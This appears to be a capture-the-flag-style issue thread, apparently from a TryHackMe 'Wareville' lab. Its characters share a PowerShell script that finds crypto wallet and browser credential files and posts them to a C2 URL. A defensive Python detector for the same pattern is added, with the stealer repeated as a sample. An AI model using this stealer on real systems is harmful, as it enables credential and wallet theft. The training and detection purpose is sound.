Bloatware-WarevilleTHM / CryptoWallet-Search

Developing experimental scripts to be used to search for crypto wallets and send the information to a C2 server that would be set up. Still a work in progress and will be unleashed to the people of Wareville.

PowerShell Version of this? #1

Closed MM-WarevilleTHM closed 1 day ago

MM-WarevilleTHM commented 1 day ago

Hey Bloatware,

I came across this pretty cool C++ script of yours and would like to use it for Wareville. My only issue is that I'm not too good with C++ and I don’t really vibe. I’m much more comfortable with PowerShell.

The code does some interesting things, like searching for wallet and browser credential files and sending the findings to a C2 server. I’d love to cross-check my PowerShell version of this, especially since my C++ skills are about as sharp as a butter knife these days.

Appreciate any guidance! Please save me from pointer madness 😅.

Bloatware-WarevilleTHM commented 1 day ago

Hey MM, thanks for the shoutout. Haha, I totally get it! Pointers and memory management can feel like trying to defuse a bomb with a toothpick.

I’m guessing it’s the file searching and C2 communication that’s got you sweating. Share your code, and we'll see what we have.

MM-WarevilleTHM commented 1 day ago

Exactly! The part where it’s checking for wallet files and credential files is straightforward, but I’m not sure how PowerShell handles things like sending data to a server.

This is what I’ve got currently; I did away with the malloc and free in PowerShell (thank goodness).

function Print-AsciiArt {
    Write-Host "  ____     _       ___  _____    ___    _   _ "
    Write-Host " / ___|   | |     |_ _||_   _|  / __|  | | | |"
    Write-Host "| |  _    | |      | |   | |   | |     | |_| |"
    Write-Host "| |_| |   | |___   | |   | |   | |__   |  _  |"
    Write-Host " \____|   |_____| |___|  |_|    \___|  |_| |_|"

    Write-Host "         Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"

    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw

    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server
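
The shape the thread is trading (enumerate wallet and browser credential stores with Test-Path, stage the hits in a text file, POST that file to a C2 URL) is also exactly what a defender keys on. The following is an added example, not part of this issue or of the CryptoWallet-Search repository: a small Python triage script that scores PowerShell script text for that combination, suitable for running over script block log text. The indicator regexes, weights and threshold are assumptions chosen for illustration, not a vetted signature; both sample scripts are constructed for the example, the first paraphrasing the script posted above.

```python
"""Triage PowerShell script text for the wallet/credential stealer pattern.

Added example for this issue, not code from the original thread or from the
CryptoWallet-Search repository. Indicator regexes, weights and the threshold
are assumptions chosen for illustration, not a vetted detection signature.
"""
import re
from dataclasses import dataclass

# (indicator name, pattern matched per line, weight). Weights are assumed.
INDICATORS = [
    ("wallet_path", re.compile(r"\\\.(bitcoin|ethereum|monero|dogecoin)\\", re.I), 3),
    ("chrome_login_data", re.compile(r"Google\\Chrome\\User Data\\.*\bLogin Data", re.I), 3),
    ("firefox_logins", re.compile(r"Mozilla\\Firefox\\Profiles\\.*logins\.json", re.I), 3),
    ("http_post", re.compile(r"Invoke-(?:WebRequest|RestMethod)\b.*-Method\s+['\"]?Post", re.I), 2),
    ("file_to_body", re.compile(r"Get-Content\b.*-Raw\b", re.I), 1),
]
COLLECTORS = {"wallet_path", "chrome_login_data", "firefox_logins"}
COMBO_BONUS = 5           # assumed: collecting secrets AND posting them out
SUSPICIOUS_THRESHOLD = 8  # assumed


@dataclass
class Finding:
    name: str
    line_no: int
    line: str


@dataclass
class Verdict:
    score: int
    findings: list


def scan_script(text: str) -> Verdict:
    """Score a script by which indicators appear and whether they combine."""
    findings, seen, score = [], set(), 0
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, pattern, weight in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
                if name not in seen:  # weight each indicator once per script
                    seen.add(name)
                    score += weight
    # The stealer's defining trait: it both enumerates secret stores and
    # POSTs out whatever it found. Either alone is common in admin scripts.
    if seen & COLLECTORS and "http_post" in seen:
        score += COMBO_BONUS
    return Verdict(score, findings)


def is_suspicious(text: str) -> bool:
    return scan_script(text).score >= SUSPICIOUS_THRESHOLD


# Constructed samples. The first paraphrases the script posted in the issue;
# the second is a benign inventory upload that shares the POST-a-file shape.
STEALER_SAMPLE = r'''
$infoFilePath = "stolen_info.txt"
$walletPaths = @(
    "$env:USERPROFILE\.bitcoin\wallet.dat",
    "$env:USERPROFILE\.ethereum\keystore\*"
)
foreach ($path in $walletPaths) {
    if (Test-Path $path) { Add-Content -Path $infoFilePath -Value "Found wallet: $path" }
}
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
$data = Get-Content -Path $infoFilePath -Raw
Invoke-WebRequest -Uri "http://papash3ll.thm/data" -Method Post -Body $data
'''

BENIGN_SAMPLE = r'''
$report = Get-Content -Path C:\logs\inventory.json -Raw
Invoke-RestMethod -Uri "https://inventory.corp.example/api/upload" -Method Post -Body $report
'''

if __name__ == "__main__":
    for label, sample in (("stealer", STEALER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict = scan_script(sample)
        print(f"{label}: score={verdict.score} suspicious={is_suspicious(sample)}")
        for f in verdict.findings:
            print(f"  line {f.line_no}: {f.name}: {f.line}")
```

Run stand-alone it prints both verdicts with the matching lines. The input a defender would actually feed it is the ScriptBlockText field of PowerShell script block log events (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), which capture the script as executed even when it was never written to disk. The combination bonus is the point: Invoke-WebRequest -Method Post with a file as the body is everyday admin work and scores low on its own, while pairing it with wallet.dat, Login Data or logins.json lookups is what makes the posted script a stealer.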

Bloatware-WarevilleTHM commented 1 day ago

Haha, yes, you’re free from the malloc/free life! PowerShell will take care of memory for you. For sending data to the server, PowerShell’s Invoke-WebRequest is your best friend, and it looks like you set it up nicely – it’s a lot easier than dealing with cURL’s verbosity.

This script keeps it nice and simple – no need for C++’s struct stat for checking file existence; PowerShell’s Test-Path handles it for you. For sending the data, Invoke-WebRequest makes the C2 part painless.

Also, I like the ASCII art you have included in it. 🙂

MM-WarevilleTHM commented 1 day ago

Thanks a lot! This would have gone a totally different way when I was thinking of writing a PowerShell script with malloc – I was about to go full C++-PowerShell hybrid and possibly break the universe.

The ASCII was just a touch of flair 😉